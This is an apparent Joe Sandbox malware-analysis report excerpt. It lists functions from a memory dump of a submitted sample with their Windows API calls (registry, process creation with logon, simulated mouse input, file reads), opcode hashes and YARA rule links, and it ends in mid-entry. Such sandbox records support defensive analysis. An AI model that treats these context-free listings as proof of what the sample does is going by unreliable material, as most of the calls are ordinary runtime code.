            • Instruction ID: 411d286ebac67907e7545b29ebcbc2ef0f1d46f3d75c54a4c70a0544ddf2a198
            • Opcode Fuzzy Hash: f679aa8d0f05fb178c43bdd4373f27921bfd3df04f7801434a1afe0a748c77bd
            • Instruction Fuzzy Hash: 42A10270504310AFD360EF24C881F2A7BE5AF95318F58899CF5969B2E2CB35ED46CB91
            Function 00FD61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FC82D9,00FC82D9,?,?,?,00FD644F,00000001,00000001,8BE85006), ref: 00FD6258
            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FD644F,00000001,00000001,8BE85006,?,?,?), ref: 00FD62DE
            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FD63D8
            • __freea.LIBCMT ref: 00FD63E5
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            • __freea.LIBCMT ref: 00FD63EE
            • __freea.LIBCMT ref: 00FD6413
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide__freea$AllocateHeap
            • String ID:
            • API String ID: 1414292761-0
            • Opcode ID: bcbac09f690478a437c1633b96ef7c683f0c240bc3f9ebe0e28533ba4c45eee4
            • Instruction ID: dc6ed4f4be8da8de6a74cfb6ab0b3b7894407c2d5c21ff9f3e31f4c5bc8773e0
            • Opcode Fuzzy Hash: bcbac09f690478a437c1633b96ef7c683f0c240bc3f9ebe0e28533ba4c45eee4
            • Instruction Fuzzy Hash: BD51D172A00216ABEB258F64CC81FAF77ABEB44720F1D422AF905D6341DB39DC44E660
            Function 0102BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 0102C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0102B6AE,?,?), ref: 0102C9B5
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102C9F1
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA68
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA9E
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102BCCA
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102BD25
            • RegCloseKey.ADVAPI32(00000000), ref: 0102BD6A
            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0102BD99
            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0102BDF3
            • RegCloseKey.ADVAPI32(?), ref: 0102BDFF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
            • String ID:
            • API String ID: 1120388591-0
            • Opcode ID: abcfd11d8852a1c714059e8f2f2dcdb401282dd4f60995443ceec4f45db7b9b3
            • Instruction ID: d87b695ebb1b34a3f75f4cf3e38ebdde171b5fc97c2fd977630980d3c363540e
            • Opcode Fuzzy Hash: abcfd11d8852a1c714059e8f2f2dcdb401282dd4f60995443ceec4f45db7b9b3
            • Instruction Fuzzy Hash: 4F81D270208241EFD714EF24C881E6ABBE5FF85308F14889DF5958B2A2DB35ED45CB92
            Function 00FFF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(00000035), ref: 00FFF7B9
            • SysAllocString.OLEAUT32(00000001), ref: 00FFF860
            • VariantCopy.OLEAUT32(00FFFA64,00000000), ref: 00FFF889
            • VariantClear.OLEAUT32(00FFFA64), ref: 00FFF8AD
            • VariantCopy.OLEAUT32(00FFFA64,00000000), ref: 00FFF8B1
            • VariantClear.OLEAUT32(?), ref: 00FFF8BB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearCopy$AllocInitString
            • String ID:
            • API String ID: 3859894641-0
            • Opcode ID: e1ed60d280da1590f2e7c2d4bdf1b0a66f427fb400711cbbb880cb5399008c07
            • Instruction ID: e88477cc965f3d956787ed3a4651f902bd67cdd9ae8049ec840ee6890bdfe276
            • Opcode Fuzzy Hash: e1ed60d280da1590f2e7c2d4bdf1b0a66f427fb400711cbbb880cb5399008c07
            • Instruction Fuzzy Hash: 2051E932A00318BADF306B65DC85B39B3A8EF45710F1484A7EA05DF2A5DBB48C44FB56
            Function 0101910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • GetOpenFileNameW.COMDLG32(00000058), ref: 010194E5
            • _wcslen.LIBCMT ref: 01019506
            • _wcslen.LIBCMT ref: 0101952D
            • GetSaveFileNameW.COMDLG32(00000058), ref: 01019585
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$FileName$OpenSave
            • String ID: X
            • API String ID: 83654149-3081909835
            • Opcode ID: 76c9cd006d0ae99b15a265c8b72f2dfb6ffe38d8460131a6e9308433fb97c470
            • Instruction ID: 06684efc06ddae3c66389a1d726b7cbf87dccf681f28bd3a174ed5f2e948e852
            • Opcode Fuzzy Hash: 76c9cd006d0ae99b15a265c8b72f2dfb6ffe38d8460131a6e9308433fb97c470
            • Instruction Fuzzy Hash: FDE1B4719083118FD724DF24C891E6EB7E4BF85314F08896DF9899B296DB39ED04CB92
            Function 00FB920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • BeginPaint.USER32(?,?,?), ref: 00FB9241
            • GetWindowRect.USER32(?,?), ref: 00FB92A5
            • ScreenToClient.USER32(?,?), ref: 00FB92C2
            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FB92D3
            • EndPaint.USER32(?,?,?,?,?), ref: 00FB9321
            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FF71EA
              • Part of subcall function 00FB9339: BeginPath.GDI32(00000000), ref: 00FB9357
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
            • String ID:
            • API String ID: 3050599898-0
            • Opcode ID: 6cdd70def0726732ac98eb3c2f202daae8e7b84f7813ee3f7e74e3adeadac2c1
            • Instruction ID: b763954304b32e7b8b42b04d9aa2a18f34d289455d71069c307c3331caf7c535
            • Opcode Fuzzy Hash: 6cdd70def0726732ac98eb3c2f202daae8e7b84f7813ee3f7e74e3adeadac2c1
            • Instruction Fuzzy Hash: 0441AF71508300AFE721DF25C884FBA7BE8EF4A320F140269FA94D72E1C7769845EB61
            Function 010107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
            Download Yara Rule
            APIs
            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0101080C
            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01010847
            • EnterCriticalSection.KERNEL32(?), ref: 01010863
            • LeaveCriticalSection.KERNEL32(?), ref: 010108DC
            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 010108F3
            • InterlockedExchange.KERNEL32(?,000001F6), ref: 01010921
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
            • String ID:
            • API String ID: 3368777196-0
            • Opcode ID: bbe2f9f5af4cdb97947158dc726d29bc5399b5fbede4cc6d0898403a78ace0a6
            • Instruction ID: b40b0f5b9cf33aedb8a10f97b5afc417d66a6474b6bb20e39b7e3da8bd09e682
            • Opcode Fuzzy Hash: bbe2f9f5af4cdb97947158dc726d29bc5399b5fbede4cc6d0898403a78ace0a6
            • Instruction Fuzzy Hash: 6D418B71900205EBEF159F64DC85AAA77B9FF04300F1440A9FD44EA29BDB39DE64DBA0
            Function 010381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
            Download Yara Rule
            APIs
            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00FFF3AB,00000000,?,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 0103824C
            • EnableWindow.USER32(00000000,00000000), ref: 01038272
            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 010382D1
            • ShowWindow.USER32(00000000,00000004), ref: 010382E5
            • EnableWindow.USER32(00000000,00000001), ref: 0103830B
            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0103832F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Show$Enable$MessageSend
            • String ID:
            • API String ID: 642888154-0
            • Opcode ID: 659746e56d24f1468b6534e61b0291c4800e44e214ecb33c72a7b5126bb6fcc1
            • Instruction ID: 42dd3400bf79a5342057f9c6429b9dc3e5d85613b38efd5f5541481a45a2ea89
            • Opcode Fuzzy Hash: 659746e56d24f1468b6534e61b0291c4800e44e214ecb33c72a7b5126bb6fcc1
            • Instruction Fuzzy Hash: BE418A34601644AFEB62CF19C989BE47BE5FB89714F1483E6FA985F2A3C3366441CB50
            Function 010222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32(?,?,00000000), ref: 010222E8
              • Part of subcall function 0101E4EC: GetWindowRect.USER32(?,?), ref: 0101E504
            • GetDesktopWindow.USER32 ref: 01022312
            • GetWindowRect.USER32(00000000), ref: 01022319
            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01022355
            • GetCursorPos.USER32(?), ref: 01022381
            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010223DF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Rectmouse_event$CursorDesktopForeground
            • String ID:
            • API String ID: 2387181109-0
            • Opcode ID: fc9932413582f7ddcabfb5a8130ef09125f6296a54e7e48fa090a9ce67176b4b
            • Instruction ID: 6444b76fe20b6ef60463a4c9b80c2fc1b6c2da283a70ff9d28077abfc0762ced
            • Opcode Fuzzy Hash: fc9932413582f7ddcabfb5a8130ef09125f6296a54e7e48fa090a9ce67176b4b
            • Instruction Fuzzy Hash: 1B31AF72504315ABE721DF54C844A9BBBEDFF88314F004A1AF9C5E7181DB35E908CB92
            Function 01004C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
            Download Yara Rule
            APIs
            • IsWindowVisible.USER32(?), ref: 01004C95
            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01004CB2
            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01004CEA
            • _wcslen.LIBCMT ref: 01004D08
            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01004D10
            • _wcsstr.LIBVCRUNTIME ref: 01004D1A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
            • String ID:
            • API String ID: 72514467-0
            • Opcode ID: d7b48e989e9a01207181a3c21f4b330b019dd2dce66e11d45c0332b2b0a810ba
            • Instruction ID: 5a71b66dcc5928b79ea99fe00263621eac9ab5e0f46b1748613cd9b1532abeea
            • Opcode Fuzzy Hash: d7b48e989e9a01207181a3c21f4b330b019dd2dce66e11d45c0332b2b0a810ba
            • Instruction Fuzzy Hash: 722149712042047BFB666B399D09E7F7BDCDF49710F00406EF945DA1D2DA75D80097A0
            Function 0101581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
            • _wcslen.LIBCMT ref: 0101587B
            • CoInitialize.OLE32(00000000), ref: 01015995
            • CoCreateInstance.OLE32(0103FCF8,00000000,00000001,0103FB68,?), ref: 010159AE
            • CoUninitialize.OLE32 ref: 010159CC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
            • String ID: .lnk
            • API String ID: 3172280962-24824748
            • Opcode ID: 83ae19e41b7dbfec0210fa242fc388513f47a72df452e8b9b4e43817f5ad754e
            • Instruction ID: bdcd04e29cd95bc255ff6f47ee9ab977f50ee1cebe1898dd4a711cd1c30b403f
            • Opcode Fuzzy Hash: 83ae19e41b7dbfec0210fa242fc388513f47a72df452e8b9b4e43817f5ad754e
            • Instruction Fuzzy Hash: A0D145716083019FC714DF19C88092ABBE6FF8A714F14889DF8899B365DB39ED45CB92
            Function 0100175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 01000FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01000FCA
              • Part of subcall function 01000FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01000FD6
              • Part of subcall function 01000FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01000FE5
              • Part of subcall function 01000FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01000FEC
              • Part of subcall function 01000FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01001002
            • GetLengthSid.ADVAPI32(?,00000000,01001335), ref: 010017AE
            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 010017BA
            • HeapAlloc.KERNEL32(00000000), ref: 010017C1
            • CopySid.ADVAPI32(00000000,00000000,?), ref: 010017DA
            • GetProcessHeap.KERNEL32(00000000,00000000,01001335), ref: 010017EE
            • HeapFree.KERNEL32(00000000), ref: 010017F5
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
            • String ID:
            • API String ID: 3008561057-0
            • Opcode ID: ff6f2d3098dd6475f6f17b06b74bdf35f65640e818306f6ee0b99461544edc3c
            • Instruction ID: b4e36248c4bd0d6eed7c2a2abd8918cdc26e5056aa5786a22617a2d07ad777fd
            • Opcode Fuzzy Hash: ff6f2d3098dd6475f6f17b06b74bdf35f65640e818306f6ee0b99461544edc3c
            • Instruction Fuzzy Hash: 1C119732600205ABFB258FA8C948BAE7BF9FB46355F104099F5C5E7280C73AE940DB60
            Function 010014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010014FF
            • OpenProcessToken.ADVAPI32(00000000), ref: 01001506
            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01001515
            • CloseHandle.KERNEL32(00000004), ref: 01001520
            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0100154F
            • DestroyEnvironmentBlock.USERENV(00000000), ref: 01001563
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
            • String ID:
            • API String ID: 1413079979-0
            • Opcode ID: a16b1932a6e99f74d196145ca1c1ef24c006e31ea514db0231ea9b19522a1b0f
            • Instruction ID: 31d16408edf17b84babd1eefdc011364df88c97263ae8586e5084fe6c650d942
            • Opcode Fuzzy Hash: a16b1932a6e99f74d196145ca1c1ef24c006e31ea514db0231ea9b19522a1b0f
            • Instruction Fuzzy Hash: 71112972500249ABEF228F98DE49BDE7BADFF09745F054055FA45A20A0C376CE64DB60
            Function 00FC3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(?,?,00FC3379,00FC2FE5), ref: 00FC3390
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FC339E
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FC33B7
            • SetLastError.KERNEL32(00000000,?,00FC3379,00FC2FE5), ref: 00FC3409
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: 252f2092f2544e48a0ff01deace9bf5542e5f8b9ef5d895096203f7702d0cec2
            • Instruction ID: d7e53d3963dee6ecb5493b5f5b5ea263e321ef0ed8818bd7e509c204e6ce646b
            • Opcode Fuzzy Hash: 252f2092f2544e48a0ff01deace9bf5542e5f8b9ef5d895096203f7702d0cec2
            • Instruction Fuzzy Hash: 0B01B133A0D3536EB62526747F9BF663A94EB163F9720822EF450852F4EF1A4E017684
            Function 00FD2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(?,?,00FD5686,00FE3CD6,?,00000000,?,00FD5B6A,?,?,?,?,?,00FCE6D1,?,01068A48), ref: 00FD2D78
            • _free.LIBCMT ref: 00FD2DAB
            • _free.LIBCMT ref: 00FD2DD3
            • SetLastError.KERNEL32(00000000,?,?,?,?,00FCE6D1,?,01068A48,00000010,00FA4F4A,?,?,00000000,00FE3CD6), ref: 00FD2DE0
            • SetLastError.KERNEL32(00000000,?,?,?,?,00FCE6D1,?,01068A48,00000010,00FA4F4A,?,?,00000000,00FE3CD6), ref: 00FD2DEC
            • _abort.LIBCMT ref: 00FD2DF2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_free$_abort
            • String ID:
            • API String ID: 3160817290-0
            • Opcode ID: c3c93e16a9eb3f9fe88c96f35f755863a1b3fef39db5849ae800d5fc28f19d00
            • Instruction ID: df1c0663d6cd0b77ab348437a7ad161dd330030691ac03e64c59fb5649169eaa
            • Opcode Fuzzy Hash: c3c93e16a9eb3f9fe88c96f35f755863a1b3fef39db5849ae800d5fc28f19d00
            • Instruction Fuzzy Hash: 75F0A936D0560067D2A226386D06A1E356B6BE27B1F2C051BF5A4D6395EE2D890172F1
            Function 01038A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB9693
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96A2
              • Part of subcall function 00FB9639: BeginPath.GDI32(?), ref: 00FB96B9
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96E2
            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01038A4E
            • LineTo.GDI32(?,00000003,00000000), ref: 01038A62
            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01038A70
            • LineTo.GDI32(?,00000000,00000003), ref: 01038A80
            • EndPath.GDI32(?), ref: 01038A90
            • StrokePath.GDI32(?), ref: 01038AA0
            Memory Dump Source
